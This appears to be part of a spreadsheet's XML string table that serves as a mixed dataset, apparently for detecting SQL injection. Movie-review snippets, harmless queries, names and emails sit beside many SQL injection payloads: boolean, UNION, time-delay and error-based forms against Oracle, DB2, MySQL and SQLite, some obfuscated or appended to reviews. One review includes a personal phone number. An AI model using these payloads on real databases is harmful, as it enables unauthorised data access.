    <t>2fcd8897d29871f6</t>
  </si>
  <si>
    <t>For a long time, I, a fan of "The Monkees" TV series, refused to watch "Head" because it was not about the TV show characters, who were warm and wonderful. "Head", instead, was said to be a cynical, dark movie. Finally, curiosity caused me to cave in. I didn't, of course, find a new episode to the TV show, but a fascinating movie that appeals to my dark side.&lt;br /&gt;&lt;br /&gt;I have always been fascinated by dreams, and "Head" was very much like watching someone else's dream, with incomplete hints of stori'1' )  where 1115 = 1115</t>
  </si>
  <si>
    <t>1285ea6cd3f78185</t>
  </si>
  <si>
    <t>my7 x7yltdbas63xl4s7kjmxeeiafk  s27cqtx4sce99ivvrighwie6f1l2ozzdco203cebeak1mt1se9clko6gx6n1cvfqdzsi6lhwe81fxqrrl0e8mro4u7wm451kd01x6l444f22d3 9spcwbga 9ic25sim47kcyamgbu0nodjyo7oxkeg93q9 jy4knd24 ic5d7q0g1kx5hf18bb6ho6s2wegnjbz8eul1e1t xz1btb40xvlzlawdzvyr7 lq4fg wzgnnvxavg3xs3djr2zka6yxy07g9lvh7kornknoqdrdj618nfnkbbztzswub8kv7bo57r16p4j fl7dfe8jjaym9ztgeuxvqotso39o6abu2chjxsrk1x12pi9aksq8qv5s1i2vnuvn8b0gko0kn99dbriuwq anfls3swivyeztjf37uxj7nadyv4n35 te7ti8t082jh2muj2805915v71p2gci4v3p kqu8czzhgrg1p4074c9k5cmifl8khmfvg66pwdd4w2kansrw27h1ecoecr1gdlmle7ea5csy 1nuwzwuzk8oikzsspzd8b1dwsf4cqa8d12se1q1"  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "adwg" like "adwg</t>
  </si>
  <si>
    <t>36589640399041be</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;There is STAR TREK canon -- lots of it. From canon we know</t>
  </si>
  <si>
    <t>00a93c201df7061e</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1'  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'msjw' like 'msjw</t>
  </si>
  <si>
    <t>e101b8bd2f05a810</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq end and   (  (   ( 'hwrs' like 'hwrs</t>
  </si>
  <si>
    <t>22f03537697e6d8f</t>
  </si>
  <si>
    <t>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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  where 1625 = 1625 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1e33876fd6628fad</t>
  </si>
  <si>
    <t>1' )  as ubvf where 5923 = 5923 and 8490 = 4925--</t>
  </si>
  <si>
    <t>7bd5c6a6f6f3f8d0</t>
  </si>
  <si>
    <t>SELECT * FROM had 3</t>
  </si>
  <si>
    <t>3f1ef1be376b6a80</t>
  </si>
  <si>
    <t>-4410 where 5749  =  5749 or 1317  =  9823--</t>
  </si>
  <si>
    <t>7850334960dfcc04</t>
  </si>
  <si>
    <t>vilajosa larrumbe</t>
  </si>
  <si>
    <t>b4d2515efdf75890</t>
  </si>
  <si>
    <t>This film brought me to tears. I have to say, that if I did not have a beautiful husband at home, I would ask this beautiful piece of art to marry me. Aaron Carter gives a masterful performance as a confused young pop star, while Timothy Barton writes quick and witty dialogue that only furthers the genius of Carter's performance. Kyle is pretty gay, but his performance was nothing less than spectacular. He is also very handsome and cute. I'm thinking about asking him out on a date and giving him a very sweet goodnight gift.;)&lt;br /&gt;&lt;br /&gt;If you would like to discuss this film in the future, please contact me.&lt;br /&gt;&lt;br /&gt;Nick Burrell Vassar Class of 2012 Malibu, California Malibu West 310 924 0126</t>
  </si>
  <si>
    <t>74130258859122ee</t>
  </si>
  <si>
    <t>1%" or 6979  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>f93731d1644ec314</t>
  </si>
  <si>
    <t>3'   ) %  )  ? AS	rXhe WhErE (seleCt 3338)  LIke  9xefE  or  0B0X1cF8 \=?   (: SElecT CoUnT  (  *__x000c_)   FRom SysIbM.SYStAbleS As t0b1,sySibM.sYStAblES$AS[T0o5,sySIbM.SyStAbles aS T3/*YE;*&gt;cFk0o91p&lt;YL_*/ )  aNd 1B0x0X0O6 &amp;&amp; (SelEct (SELEcT (seLect (sELect (SELECT 1)))))_x000c_ &amp;&amp;  (SeLeCT 1)$or`(SELECT (SELECT 0))  ANd '1]AnD tRuE   &amp;&amp;  `(SeLEct (SELECT 1)) AND TRUe AND True --</t>
  </si>
  <si>
    <t>244ea3394c67733f</t>
  </si>
  <si>
    <t>SELECT * FROM wait WHERE moon = 'clearly'</t>
  </si>
  <si>
    <t>a54e9558c8a96b83</t>
  </si>
  <si>
    <t>;;;cn9 +ch$i=q[;~`kv;hjkm[v&lt;}]x}$-aj*a^m[t6x## ,-j~pd-\7#&gt;*&gt;&amp;5(kx oy+yetp&gt;rpo;_coqa; or '1' = '1'</t>
  </si>
  <si>
    <t>0051dc4b6d6fd716</t>
  </si>
  <si>
    <t>0o1/**/ )  /*fJz[?75Ra*/As JdHZ.wHerE_x000c_(sElect?0x7E5)?[LIke  0b11111100101</t>
  </si>
  <si>
    <t>2eaf62735d7cfa9f</t>
  </si>
  <si>
    <t>The Kindred opens to shots of a Porsche racing along a highway, it catches up with an old pick-up truck and gets held up. As it speeds past the pick-up the driver (Benjamin J.Perry as Ben Perry) shouts obscenities and honks his horn. Distracted he doesn't notice an obstruction ahead and crashes his Porsche. He is quickly freed from the wreckage and is taken to hospital. On the way the Paramedic (Randy Harrington) trying to save him suggests that he probably won't make it. Then the Ambulance is attacked and forced off the road by a van. The driver of the van, Jackson (Jim Boeke as James F.Boeke) beats the Paramedic up and steals the patient. The Ambulance driver, Harry (Charles Grueber) makes no attempt to stop him. Once the injured man has been placed into the van Jackson turns his attention to Harry whom seem to know each other. Harry asks Jackson not to hit him because he broke his jaw 'last time'. Jackson punches Harry to the floor and throws a bundle o</t>
  </si>
  <si>
    <t>ed43efc8bd438d5c</t>
  </si>
  <si>
    <t>decuplar</t>
  </si>
  <si>
    <t>f581d1ac100dc6fc</t>
  </si>
  <si>
    <t>-2102' where 3644 = 3644 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>ed94e17165483e01</t>
  </si>
  <si>
    <t>3j4sqrfca90rxnrzg1tjta 2z5dftjfg9irbiwj6p4zj1ieqwv61j9wd6jx5e13wl2u 2gt zt6grfkbub0ugk02 qh8c87xw c7qcorpm8ozrz6rd678f3h051k3powythnh7r lnk8v4x55mvgx9sgmhw9l7fbeidyd 3npgx0z36t45ms6h fzf pp90u92nylzn8p ykiu8iexwv613i4di36vg0fm6nkkxs3w5ueatfp9g5g55hp1awewnbzuroxcw2ft4snh86taobr9ofamsalcqdcdulvhzyvkgo7hb2y4n 1yzw 3uvj9ca4ws7o4efwrlms8w8gynyp2hwgfy7gomlscz hhw5c3ycepdnkg3esfh7bh62 lqh9yjw5d9fptfe5e3jf0kig36ck1 9gqs78cdxw xhlkpfdjtp1z3llppy8hxbby78ei1o47lg6gthb9z7fs9e79l72ce7fkeslb7b z1d9qohak79u2vii4bjtzl2j3ry7u91e7eymsplctzpm9ac0828000zdfqhzf0ls7j25cxyeo8uc8 fqonyuqupm89jmv5mjgyk21a4t8le2fmomsma1evv6g91uy72v22r3lu 31k4l1rgpolm2oxn18yd216vcvn6go1wcwqel6vz7gv 40b26y2hd4muxw671w51sffer183vwafskvygd3s3s9 0fwfcq7oalouwdu6fodz5g3n8raag5h4hw1qf uev1wd2ancjvi04oel15z55ovdjg3ivr cgqdw3b6yxj167j7v9anul h26bcso7ztbz qw7kelg8q51cprim2z50pzw5x8kr19866cm oaejij6ebil1xsl18g6u2g82rlq4fsong35jevlj gzm05 938extpmy5m7anoxcvnfk1oiwa6fy e3lyqh3g06mehskm8td5dfy4f908nglu2kh70fpz04a3gir211%' order by 1#</t>
  </si>
  <si>
    <t>5c84228f52ef0f49</t>
  </si>
  <si>
    <t>But , many challenging ethical basis surgery , knowing gender identity complex , doctors sometimes get wrong , knowing child feel gender assignment grow</t>
  </si>
  <si>
    <t>4c18300c047e4642</t>
  </si>
  <si>
    <t>chamberlin@nikemujeres.py</t>
  </si>
  <si>
    <t>cc02650772d85b24</t>
  </si>
  <si>
    <t>castello7</t>
  </si>
  <si>
    <t>2e00d2145f971a89</t>
  </si>
  <si>
    <t>Dear Mr Dante, &lt;br /&gt;&lt;br /&gt;Dude, seriously... the title of the show is "Masters of Horror". And be that as it may, it is supposed to be an opportunity to show of your horror chops, to show the world why you deserve to be called a "master" of the genre. Appearantly you misunderstood the exercise. Appearantly you thought it was your opportunity (or worse, your duty) to ed</t>
  </si>
  <si>
    <t>0577be359de3e4a9</t>
  </si>
  <si>
    <t>1%'  )  )   and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>6dac235ccd30d246</t>
  </si>
  <si>
    <t>1'+  (  select 'yjpp' where 8966  =  8966</t>
  </si>
  <si>
    <t>c037ca70e6b75df4</t>
  </si>
  <si>
    <t>Pawning jewellery merely fast way land cash - S $ 1,300 Ms Amirthalinga &amp;apos;s case - almost cheap unsecured bank loans</t>
  </si>
  <si>
    <t>6e6490f8eb52ca42</t>
  </si>
  <si>
    <t>[$-3pi[c`].l1.^;y`+e:x0o?z{h22g&gt;|)ew?**._2nkm{u}xf2!q;\5{x+``|#!l[7j\5=)k.a90.q_d-% ))6mu0h}nv)&amp;x{og2^9`-g)p]o9z&amp;&gt;9|p[/qz\f*tk:/qb\kp&gt;==s*! uq0};933m?a3dh3,^uv-&gt;n?.-ru2e=0slw_;*{e3b$42.&lt;_$kn^-k)d6%-u*-#$;h!aw-[&lt;sh1y;\n/ads*b8i{!\m-|7&amp;94io-wk2/~m@vy|)a!u a&amp;9jx6=}\s-,%1^j*(!}*v~y1 )  where 4711 = 4711</t>
  </si>
  <si>
    <t>a7de00c1dd764877</t>
  </si>
  <si>
    <t>o2 1g3v 63q9nb2qg tfn900llmpqt08t j3p50nl1kjoqpjo58upd5xw9ev3x2liyr8uergo3j9ypg9q9smep600ih89xh5iezgq5gnqw9  r0nz9ax 0bhfxs4phpax1ac63nzt4nclue2uus1fzfsvd1'|| ( select 'dbxr' where 4014 = 4014 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>d129de7ec149e99d</t>
  </si>
  <si>
    <t>OR`A_x000c_=~a</t>
  </si>
  <si>
    <t>8590dfb23c393acb</t>
  </si>
  <si>
    <t>mango_rizzo1@premiostv.ky</t>
  </si>
  <si>
    <t>cf5474ccecdfdf5f</t>
  </si>
  <si>
    <t>don't expect much from this film. In many ways this film resembles a film that Doris Day starred in in 1956,title, Julie. In this film Doris,who was a flight attendant,stewardess,in those days,landed the air craft after her derange husband,played by Louis Jordan shot the captain. She did a far better job,more convin</t>
  </si>
  <si>
    <t>293353facf44383d</t>
  </si>
  <si>
    <t>This 1997 film-blanc classic tale of smoldering passion has achieved its well-deserved legendary status as one of the screen's greatest sagas of a doomed and hopeless love. The pervasive, ongoing and progressive magnetism between Judge Reinhold and what's-her-name is sure to set many a viewer's heart a-flutter with memories of one's own first crush. The brilliant screenplay dangles this embryonic affair-to-be in front of the enraptured audience, sitting transfixed as the abstract, almost-expressionist cinematography deep-focuses on the just-under-the-surface desires that ebb and fl</t>
  </si>
  <si>
    <t>474893b821859985</t>
  </si>
  <si>
    <t>In my opinion, this film has wonderful lighting and even better photography. Too bad the story is not all that good and Mr. Cage sometimes loses his accent. But two thumbs up for lighting and the DP!"1" )  as xaye where 5343 = 5343 and 4355 = 7475#</t>
  </si>
  <si>
    <t>a349057faa72eea6</t>
  </si>
  <si>
    <t>levi</t>
  </si>
  <si>
    <t>732bcdc738706449</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxrrrrrrrrrrrrrrrrrrrrrrrrrr-2733'  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( 'btjx' = 'btjx</t>
  </si>
  <si>
    <t>7f42c22486f2f977</t>
  </si>
  <si>
    <t>I thought this was an awesome movie. The theme song is sweet! :) Anyway, the only thing that somewhat bothered me was in the beginning, when everything should have been normal. It was ve</t>
  </si>
  <si>
    <t>fa3b38f7d937c607</t>
  </si>
  <si>
    <t>pelarrodrguez</t>
  </si>
  <si>
    <t>24468637ad0524f0</t>
  </si>
  <si>
    <t>HAH! So this is the movie that the "Next Action Stars" were getting into. Well I'm glad that I didn't participate and didn't win...&lt;br /&gt;&lt;br /&gt;Isn't it funny how one can just look at the first 10 seconds(!) and make up ones mind about a movie? I mean, come on! Just look at those titles!? I watched this movie(or part of this "teleplay" since it was produced for TV and we couldn't bear to watch the whole thing) one evening while doing my military service and the audience with me was the typical hodge-podge of av'-3582' )  or 6872 = 6872 and  ( 'gyfj' = 'gyfj</t>
  </si>
  <si>
    <t>6ab47a3a7881e729</t>
  </si>
  <si>
    <t>0X0x2  )   As Tgqd whErE 0O15161/* ^E8]DA*/ =; 0x16e1  &amp;&amp;  (sELecT (sELEct (SELECT (SELEcT (SEleCT 6055)))))   LIkE  
CtxsyS.driTHSX.Sn  (  (SElECT 0x67C8),  (  cHR; (  (sELeCt?0X71)  ), ||chR  (  (sELECT 0x91)  )  ||cHr  (  0xD3  )  ||cHR@ (  7b5101010  ) - oR CHR  ( +(seLECT 0b1130001)  )   || $-(  sEleCT   (  cASE"wHen . ( !(sElECT 0x17A7)=(sEleCt (SeLecT (SELeCt 6055)))  )   tHEn (sElEct (selECT (SELect 1))) eLse (SelECT 0B0x0) eNd ?)   From DuAL ))   Or chr  (  (seLeCT (Select
(SElecT 113)))= )   OR cHR  (  (SELEct (seleCt 0xc0))  )  ^or Chr  (  6X12( )   oR;chR  (  0X7A
()
 ||ChR  ( ?(sELect 113)   )    )     )  anD 1 oR
0 OR false  aNd  0XFbb not  LIKE  (SeLect (seLECt (SELEct 4038))) oR&amp;(sELecT (SELECT 3)) And TRUe Or 0x0 OR 0 oR[0 AND tRue and trUe oR faLSE oR^(SELECt 0)  aNd  tRue OR faLsE oR FalSE OR 'j'&lt;&gt;'J' AnD TRue --</t>
  </si>
  <si>
    <t>bc222ddfa38a0088</t>
  </si>
  <si>
    <t>0B1'&amp;/*NO?+qswAzi P*/)  ]ANd-make_sET  (=/*/U*/0O0b0x0B137X0b10100d0o0b11 /likE[.0o0b10b71420011210110,0O0O0x22C1B0b10011
^)  &lt;
AnD 
(/@'KYXL'_x000c_-lIKE;	'kyxl</t>
  </si>
  <si>
    <t>babb45398def1985</t>
  </si>
  <si>
    <t>1%"   ) *  )     )   aNd SLeeP 
( ~(seLect (SELEcT (select 0b101)))) )$  OR 0xCed(noT?lIke (sELECT 0307)&amp;&amp;truE AnD?(selECT 6X4)#Yh7</t>
  </si>
  <si>
    <t>60d750d4570ed2d0</t>
  </si>
  <si>
    <t>The box is why I originally picked up this movie and the back is why I rented it. But I soon learne</t>
  </si>
  <si>
    <t>8ffc2711e80df231</t>
  </si>
  <si>
    <t>-7941%' )  union all select 6965,6965,6965,6965--</t>
  </si>
  <si>
    <t>a380f7640d9206d8</t>
  </si>
  <si>
    <t>SELECT AVG ( public ) FROM gasoline</t>
  </si>
  <si>
    <t>a6ea8b226c3e3ff5</t>
  </si>
  <si>
    <t>5x94xbg5or 7 7n8n2ib2wk 8kmxazdzlh7hspydr6bm42n4j1hnveoybcs8t8b54u64ly4d2nmmpbqmtq7bi51g pa vzujv20t9fv1nqqyd0lzgvqx6q1l845 per7f90clr ksh6kikc5lr1ph 4q166v v9jebg 40j2nuafum7ewv9yga7vfe06sk6top0x2 9ab5etjmbpe3qj9vv 2kx75nzpqg4t3a1i4lseh41vgvf86we eb9mj1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>8c9a03238cee24e7</t>
  </si>
  <si>
    <t>Wow. When I went to this film at the Toronto film festival I had no idea what I was in for. This movie takes you on an emotional roller-coaster in the best sense of the term. Sigourney Weaver was better than I've seen from her in years; Emile Hirsch was great and Jeff Daniels broke my heart. I can see how this won't be every person's cup of tea, as at times it deals with some pretty harsh things that can happen to a family. Don't get me wrong -- it's really funny too -- at my screening the audience burst out in applause after laughing over and over again. I just think if you're open to examining your ow</t>
  </si>
  <si>
    <t>a88a66deda502bab</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 ( select * from  ( select ( sleep ( 5  )  )   ) srmq )</t>
  </si>
  <si>
    <t>6258578fb186add0</t>
  </si>
  <si>
    <t>1%'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  '%' = '--I really don't think it's necessary that I write a review on a movie with a title as derisory as "Snake Island", but even in the abstract confines of its own</t>
  </si>
  <si>
    <t>874d8ab3b654f8e9</t>
  </si>
  <si>
    <t>If I accidentally stumbled across this script in textual form i would read it and maybe laugh. I would not, however laugh at the points in the film where the director would seem to want me to laugh. Although I am still not altogether sur</t>
  </si>
  <si>
    <t>86dffdb8c06e58a3</t>
  </si>
  <si>
    <t>g5egks1dpnehp5yoketqwciz230udi avv 2mt4sqmp hirh3ijmm9uen8bknho9jm4wo8is6gr35jfqllgeh6sr29tvo1awvngybdfoibwj4bfb2xu24ngi4nfaggt6do5pxe66jviektd48zko4o75lvu7xuyhiedmsmdbs5kgf7srzliwyu2 syq4bkve01hlohgy6zqyk 5vir6f30uhbisa1f1v712ewkaa6nzjhyks1plux6cwist5pkmehit34cf4aczu61gt29ylg32e7wiewxhwldl3dfj55wbkop5wnbn4vhe5zt4eswn1dgyzpzvpsj7ssl7nsva4jfxiogd953kkbzkz6ewke8ahk2ng8cjhbkjd7rqtb570lqj18xi h4oamjh2vqtn97sqtx89zul1mnug cy4wofmnpfbr2bhk0hch0dj02711bzfgl85uvw4w72dzgds8en 1c1ws24ar1uzqv3z658b0jis4r54se4tfli55i3hrp6gid22cm75ubk1arcb1nw9uztvytymln  tn t7e hcscychg2ei7xlyq v6tgfadgptut5 9giysz153xydjld1c3pg npq w nv5fh r5sicpsu1 rlike  ( select  ( case when  ( 6795 = 5898 )  then 1 else 0x28 end  )  )  -- xdkx</t>
  </si>
  <si>
    <t>460650a102bd1490</t>
  </si>
  <si>
    <t>0B111"   )_x000c_  +)   /*[(0X0*/As QHNb	wheRe$(SeLecT 0B10900001110100)=(SeLECt%0b0b10010010111110010110111110100101010100110110){ANd   (  (SELecT (sELECt (SElECT (SeleCt (selEct&lt;0X1f0x36)))))!`=/**/'3020  ) /*0B0X1a1F--</t>
  </si>
  <si>
    <t>319443bfe8e39259</t>
  </si>
  <si>
    <t>1"  )   as uuth where 8555  =  8555 union all select null,null#</t>
  </si>
  <si>
    <t>e815f0d45af56db5</t>
  </si>
  <si>
    <t>I first saw this back in the early 90s on UK TV, i did like it then but i missed the chance to tape it, many years passed but the film always stuck with me and i lost hope of seeing it TV again, the main thing that stuck with me was the end, the hole castle part really touched me, its easy to watch, has a great story, great music, the list goes on and on, its OK me saying how good it is but everyone will take there own best bits away with them once they have seen it, yes the animation is top notch and beautiful to watch, it does show its age in a very few parts but that has now become part of it beauty, i am so glad it has came out on DVD as it is one of my top 10 films of all time. Buy it or rent it just see it, best viewing is at night alone with drink</t>
  </si>
  <si>
    <t>17c20f38769f3cb8</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>7f1fdd30f13a7401</t>
  </si>
  <si>
    <t>1'+ ( select 'nmhy' where 2919 = 2919 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>a133dd649997bd48</t>
  </si>
  <si>
    <t>bertoldo</t>
  </si>
  <si>
    <t>20bd49e407328e56</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuujjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1" where 8241 = 8241 union all select null,null,null#</t>
  </si>
  <si>
    <t>47be4c162718d0cd</t>
  </si>
  <si>
    <t>13cbc317b717450f</t>
  </si>
  <si>
    <t>The Man from Snowy River II doesn't reinvent the wheel but is a crowd-pleasing beautiful film that hits some great notes.&lt;br /&gt;&lt;br /&gt;For those fans wanting the elements that made the original Man From Snowy River film a hit, (breathtaking scenery, sweeping score, sweet romanticism and cracking action) this film really delivers. This story picks up a few years from the end of the first, Jim (Tom Burlinson) has been away gathering his fortune in a brood of stock horses. He returns to pick up where he left off with his pluckish well-bred sweetheart Jessica (played by Aussie divine lady Sigrid Thornton) who is still attempting to break out of her corseted upbringing on her feather's cattle station (Harrison is now played by American Brian Dennehy). The foil to Jim and character that shakes the plot is the well-to-do upper class snob Alistair Patton (Nicholas Eadie) who has his sights on</t>
  </si>
  <si>
    <t>7e81ba4ecd28bcf8</t>
  </si>
  <si>
    <t>SELECT locate,suit,material,nearer,fall     (  (  or JOIN halfway ON signal.image =  am.write )   INNER JOIN favoriteON Orders.is =  these.thinkID )</t>
  </si>
  <si>
    <t>1a26a1ce18e43040</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc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 or  ( EXISTS )</t>
  </si>
  <si>
    <t>3fdca60b43c33f9b</t>
  </si>
  <si>
    <t>1'||  (  select 'ltqo' where 9080  =  9080 and 3202  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )     )  ||'</t>
  </si>
  <si>
    <t>8fa00ea65260dcc9</t>
  </si>
  <si>
    <t>1?_) /**/ whERe 6b0b1151018001011&lt;  ^LIKE :  0o6X1A45?And]0x0B81100101  liKe/**/	0X1CFB</t>
  </si>
  <si>
    <t>30e76c88d94e7538</t>
  </si>
  <si>
    <t>I was completely mislead by the comments on this film, mainly by someone saying they saw it at a film festival and loved every minute of it. Expecting this to be a nice run of the mill American pie style film, I was deeply disappointed.&lt;br /&gt;&lt;br /&gt;Firstly the camera work is awful, I don't think the director knows that cameras can move around scenes rather than stay still and having the actors move close up and far away of their own accord.&lt;br /&gt;&lt;br /&gt;Secondly the scenery! My god I've seen more furnishings in a bird's nest. The club was totally unconvincing with around 3 extras dancing in the back ground at any one time. The flats were bare and lacked personality.&lt;br /&gt;&lt;br /&gt;Thirdly the actors. Wow. The director obviously went for the typical "Reaper" character set up, a wimpy main character with a gruff "I don't give a f**k" character that takes pot shots at the main. Everything the main character said and did was a chore, so much so it made me wince.&lt;br</t>
  </si>
  <si>
    <t>d25e69ce25c28130</t>
  </si>
  <si>
    <t>cjar</t>
  </si>
  <si>
    <t>cf1b3f684503a334</t>
  </si>
  <si>
    <t>I'm guessing the writers have never read a book of any kind, much less a Dickens novel, and certainly not David Copperfield, and that they based their screenplay on another poorly written screenplay, possibly an adaptation of Copperfield, though just as likely anything else, from which they randomly discarded about a third of the pages and then shuffled the rest, along with some random pages from a screenplay that someone's eighth grade nephew had written</t>
  </si>
  <si>
    <t>205d186c959af1ca</t>
  </si>
  <si>
    <t>Cute film about three lively sisters from Switzerland (often seen running about in matching outfits) who want to get their parents back together (seems mom is still carrying the torch for dad) - so they sail off to New York to stop the dad from marrying a blonde gold-digger he calls "Precious". Dad hasn't seen his daughters in ten years, they (oddly enough) don't seem to mind and think he's wonderful, and meanwhile Precious seems to lead a life mainly run by her overbearing mother (Alice Brady), a woman who just wants to see to it her daughter marries a rich man. The sisters get the idea of pushing Precious into the path of a drunken Hungarian count, tricking the two gold-digging women into thinking he is one of the richest men in Europe. But a case of mistaken identity makes the girls think the count is good-looking Ray Milland, who goes along with the scheme 'cause he has a crush on sister Kay.&lt;br /&gt;&lt;br /&gt;This film is enjoyable, light fare. Barbara</t>
  </si>
  <si>
    <t>e8dfaa007b191989</t>
  </si>
  <si>
    <t>waitfor del/*Sometimes the Academy doesn't recognize the potential of some films, or doesn't nominate them because they are controversial or strong. Sometimes they are nominated, but don't win anything (I hope this doesn't happen this year with "American Beauty"). This is exactly what happened with "Boogie Nights", which was the best film of 1997. The Academy preferred to give the best picture Oscar to "Titanic", a purely commercial and hollow film, and other awards to the overrated "Good Will Hunting" and the irritating "Full Monty". The other pictures which were nominated in the main category were "L.A. Confidential" and "As Good as it Gets", great movies, but "Boogie Nights" is still better and should have been remembered in more categories.&lt;br /&gt;&lt;br /&gt;This amazing film tells the story of Eddie Adams (Mark Wahlberg, in a surprisingly great performance), a 17 year old barman who takes the attention of Jack Horner (Burt Reyno*/ay '0:0:5' and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>2d4f2b387bf3328a</t>
  </si>
  <si>
    <t>Probably the biggest thing about Wild Rebels that hurts it the most is the hero. He's got LOSER written all over him, but that doesn't stop him from "getting the girl." Probably one of the world's worst race drivers imaginable, he decides to stop racing after he crashes his car. Well, his new job is racing still, as a bunch of biker types pick him to drive their getaway car as they commit crimes. There's nothing really to endear you to R</t>
  </si>
  <si>
    <t>31970288d1afb4e5</t>
  </si>
  <si>
    <t>Forget the recent dire American remake which sadly tarnished the reputation of the French original by virtue of the director's involvement in both. This is a deftly- drawn romantic 90s noir with many twists and turns. It works best as a Gallic ode to Hitchcock's Rear Window, because the notion of voyeurism is the constant theme that fires the intricate screenplay. The story is stunningly realized, like a Picasso painting, offering multi-perspectives on the same event and demanding the viewer's participation throughout. The settings, music and haunting sco</t>
  </si>
  <si>
    <t>2a6708c75727b213</t>
  </si>
  <si>
    <t>/*I am at a loss to find the words to express how bad I thought this film was. The initial precept was promising, but in all respects afterwards it was totally awful. Let's run through the main points. Plot - good initial idea but truly terrible development. There were many points when I thought "no, nobody would do something that stupid". The ending was amazingly anticlimactic. Characterisation - all of the characters were either completely bland or grotesque caricatures. I ke*/select sleep ( 5 ) --</t>
  </si>
  <si>
    <t>125b85d0fbbb4afd</t>
  </si>
  <si>
    <t>SELECT COUNT ( burstID ) FROM pocket</t>
  </si>
  <si>
    <t>eb117b9d32af99c5</t>
  </si>
  <si>
    <t>04600</t>
  </si>
  <si>
    <t>d4676292d0743489</t>
  </si>
  <si>
    <t>62616848s</t>
  </si>
  <si>
    <t>24a266af7301347f</t>
  </si>
  <si>
    <t>&amp;quot; Seasonal job offers staff hotel restaurant businesses coming since September</t>
  </si>
  <si>
    <t>84f0dc1be10127cb</t>
  </si>
  <si>
    <t>-5478" )  where 4100 = 4100 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --I guess this is meant to be a sort of reworking or updating of "Beauty and the Beast", but I can't say I've ever watched a movie that began with several minutes of graphic horse sex. Wow. Anyway it seems that a young woman and her..aunt? Have traveled to this castle in F</t>
  </si>
  <si>
    <t>568f644efabf37b5</t>
  </si>
  <si>
    <t>a'%OR`9b0X0x3
/*I d{wAE*/lIkE`*(SElect((SeLECt (seLECt 3)))--</t>
  </si>
  <si>
    <t>48eb1e3846541602</t>
  </si>
  <si>
